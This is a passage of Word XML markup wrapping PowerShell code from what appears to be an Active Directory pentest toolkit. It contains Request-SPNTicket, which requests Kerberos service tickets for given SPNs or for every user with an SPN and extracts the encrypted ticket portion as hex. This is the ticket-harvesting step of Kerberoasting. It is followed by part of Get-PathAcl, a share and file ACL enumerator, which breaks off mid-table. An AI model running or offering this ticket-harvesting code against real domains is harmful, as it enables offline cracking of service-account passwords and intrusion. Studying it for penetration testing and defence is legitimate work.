    <w:p w14:paraId="524DD39D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0EBC14FD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="607DF76A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Request-SPNTicket {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B897E9D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CB3676" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F51626" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5F7C02" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Request the kerberos ticket for a specified service principal name (SPN).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D252827" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35822853" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER SPN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D51CEEB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="267BF440" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        The service principal name to request the ticket for. Required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C55FDC8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F5ED40" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER EncPart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9B7303" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78980DDB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Return the encrypted portion of the ticket (cipher).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C588D9B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6C3D67AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABF0EC6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5EA67AF3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Request-SPNTicket -SPN "HTTP/web.testlab.local"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C79EE2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C271F71" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Request a kerberos service ticket for the specified SPN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EDF5A3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF541E8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEE5D5C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1C808AD6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Request-SPNTicket -SPN "HTTP/web.testlab.local" -EncPart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5AE340" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCCC7DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Request a kerberos service ticket for the specified SPN and return the encrypted portion of the ticket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1C83A3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="12F2E4F3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4604DD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="183549CF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; "HTTP/web1.testlab.local","HTTP/web2.testlab.local" | Request-SPNTicket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5D5487" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4A80A013" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Request kerberos service tickets for all SPNs passed on the pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4389DB5C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1AB125D3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1904DB7C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6A64D0A0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetUser -SPN | Request-SPNTicket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A48D40" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1BCBA525" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        Request kerberos service tickets for all users with non-null SPNs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8B4E8F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7151C725" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6951D8BD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F4C612" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Param (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605F5A3B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Mandatory=$True, ValueFromPipelineByPropertyName = $True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45158464" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('ServicePrincipalName')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6584CCF0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String[]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B70082" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SPN,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319B5597" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2F5DF2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('EncryptedPart')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4733C975" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C45E5A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $EncPart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10647C2A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FC0616" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="548267FC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    begin {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DC2144" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Add-Type -AssemblyName System.IdentityModel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF4E4B2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F68D4E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6297C0ED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    process {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D12AE6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        ForEach($UserSPN in $SPN) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D679B7C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "Requesting ticket for: $UserSPN"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC4CD78" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if (!$EncPart) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0B643D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $UserSPN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F11445D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74787335" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE8A6C6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $UserSPN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3752D0C6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                $TicketByteStream = $Ticket.GetRequest()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F200368" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if ($TicketByteStream)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2FB7ED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AFBE69" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $TicketHexStream = [System.BitConverter]::ToString($TicketByteStream) -replace "-"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6828AEA3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    [System.Collections.ArrayList]$Parts = ($TicketHexStream -replace '^(.*?)04820...(.*)','$2') -Split "A48201"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC0A403" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Parts.RemoveAt($Parts.Count - 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28611083" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Parts -join "A48201"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC32A29" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1035460F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CD54C9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3A8AB8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E89DAB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F58775" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5A6147" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0852CF77" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6BEDC692" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Get-PathAcl {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE7ADAD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FE8936" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE29B68" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C70C6DC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Enumerates the ACL for a given file path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D89DD35" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5CF81AAF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3524A316" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="599151F7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The local/remote path to enumerate the ACLs for.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37025BCE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7088B6F7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Recurse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E0065C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7860CF29" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        If any ACL results are groups, recurse and retrieve user membership.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F84CA2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="34A0BCB1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1573A3FA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="106660DA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-PathAcl "\\SERVER\Share\" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429E330F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A199234" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns ACLs for the given UNC share.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520AA0DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCA4587" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DA46EC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDFC7BE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Mandatory=$True, ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FE8F2D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C7924F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Path,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244495D3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7634912C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B236CD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Recurse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24ED2D04" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E4C46D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="18505880" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    begin {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5FE43D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="42C3EBC6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        function Convert-FileRight {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7138EF2E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="303CB943" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # From http://stackoverflow.com/questions/28029872/retrieving-security-descriptor-and-getting-number-for-filesystemrights</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249C1B6E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="13D50782" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8DB0B5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC10F95" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257F9C79" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $FSR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA2A387" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19683628" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4DF25447" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $AccessMask = @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64980706" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">              [uint32]'0x80000000' = 'GenericRead'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37526C36" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">              [uint32]'0x40000000' = 'GenericWrite'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700E3732" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">              [uint32]'0x20000000' = 'GenericExecute'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C68625C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">              [uint32]'0x10000000' = 'GenericAll'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B926485" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">              [uint32]'0x02000000' = 'MaximumAllowed'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A274152" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">              [uint32]'0x01000000' = 'AccessSystemSecurity'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F01BC23" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">              [uint32]'0x00100000' = 'Synchronize'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509B39EB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">              [uint32]'0x00080000' = 'WriteOwner'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E09D6D7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">              [uint32]'0x00040000' = 'WriteDAC'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A83FA95" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">              [uint32]'0x00020000' = 'ReadControl'</w:t>
      </w:r>
    </w:p>
